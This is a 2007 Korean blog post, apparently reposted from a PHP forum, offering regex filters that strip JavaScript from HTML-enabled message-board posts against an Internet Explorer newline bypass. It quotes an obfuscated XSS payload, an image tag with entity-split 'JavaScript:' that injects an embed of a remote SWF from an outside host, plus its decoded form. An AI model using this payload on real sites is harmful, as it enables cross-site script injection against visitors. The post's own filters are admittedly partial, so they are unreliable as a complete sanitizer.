마음의 안정을 찾기 위하여 - [보안] IE hack 방지]게시판 본문에서 js 제거
1807714
119
360
관리자새글쓰기
태그위치로그방명록
별일없다의 생각
dawnsea's me2day/2010
색상(RGB)코드 추출기(Color...
Connection Generator/2010
최승호PD, '4대강 거짓말 검...
Green Monkey**/2010
Syng의 생각
syng's me2DAY/2010
천재 작곡가 윤일상이 기획,...
엘븐킹's Digital Factory/2010
[보안] IE hack 방지]게시판 본문에서 js 제거
Web, Script | 2007/10/22 08:54
출처  : http://www.phpschool.com/gnuboard4/bbs/board.php?bo_table=tipntech&wr_id=56700&page=1
http://www.phpschool.com/gnuboard4/bbs/board.php?bo_table=talkbox&wr_id=737742&page=1&sfl=&stx=&spt=&page=1&cwin=#c_737751

문제는 이 글보고 알았습니다.

IE 에서 href 주소의 엔터는 가볍게 무시되고 실행됩니다.

html 허용한 게시판에서 js 를 제거하도록 하게 되어 있다면,
정규식을 좀더 세밀하게 할 필요가 있겠습니다.

아래는 예로써만 참조하시고, 알아서 강화하세요.

$html = preg_replace('/on([^\'">=]+=)/i', 'off\1', $html);
$html = preg_replace_callback('/(href|src)[\t\s\r\n]*=[\t\s\r\n]*((["\']).*?(?<!\x5c)\3)/is', 'iehack_escape', $html);
$html = preg_replace('/((href|src)=.?)(j(ava)?)?script/i', '\1javaworker', $html);

function iehack_escape($matches)
{
    return $matches[1].'='.preg_replace('/(&#(x0*[da]|0*1[03]);|[\r\n])/i', '', $matches[2]);
}

License : Public Domain


<DIV id=ff><IMG src=Ja&#x0A;va&#x0D;Script:ff.in&#x0A;ner&#x0A;HTML=u&#x0A;ne&#x0A;sca&#x0A;pe("\x3C\x65\x6D\x62\x65\x64\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x64\x61\x75\x6D\x75\x63\x63\x2E\x63\x61\x66\x65\x32\x34\x2E\x63\x6F\x6D\x2F\x74\x2E\x73\x77\x66\x20\x77\x69\x64\x74\x68\x3D\x30\x20\x68\x65\x69\x67\x68\x74\x3D\x30\x3E")></div>


javascript:ff.innerHTML=unescape('<embed src=http://daumucc.cafe24.com/t.swf width=0 height=0>')


전형적인 xss를 이용한 원격 hack 방법중 하납니다 :)
<xml></xml> 태그를 집어넣으면 바로 확인됩니다.

2007/10/22 08:54 2007/10/22 08:54
Article tag list Go to top
View Comment 0
Trackback URL :: 이 글에는 트랙백을 보낼 수 없습니다
 
 
 
 
: [1] ... [651][652][653][654][655][656][657][658][659] ... [849] :
«   2020/12   »
    1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31    
전체 (849)
출판 준비 (0)
My-Pro... (41)
사는 ... (492)
블로그... (22)
My Lib... (32)
게임 ... (23)
개발관... (3)
Smart ... (1)
Delphi (76)
C Builder (0)
Object... (0)
VC, MF... (9)
Window... (1)
Open API (3)
Visual... (0)
Java, JSP (2)
ASP.NET (0)
PHP (4)
Database (12)
리눅스 (28)
Windows (21)
Device... (1)
Embedded (1)
게임 ... (0)
Web Se... (2)
Web, S... (19)
잡다한... (5)
프로젝트 (0)
Personal (0)
대통령... (9)
Link (2)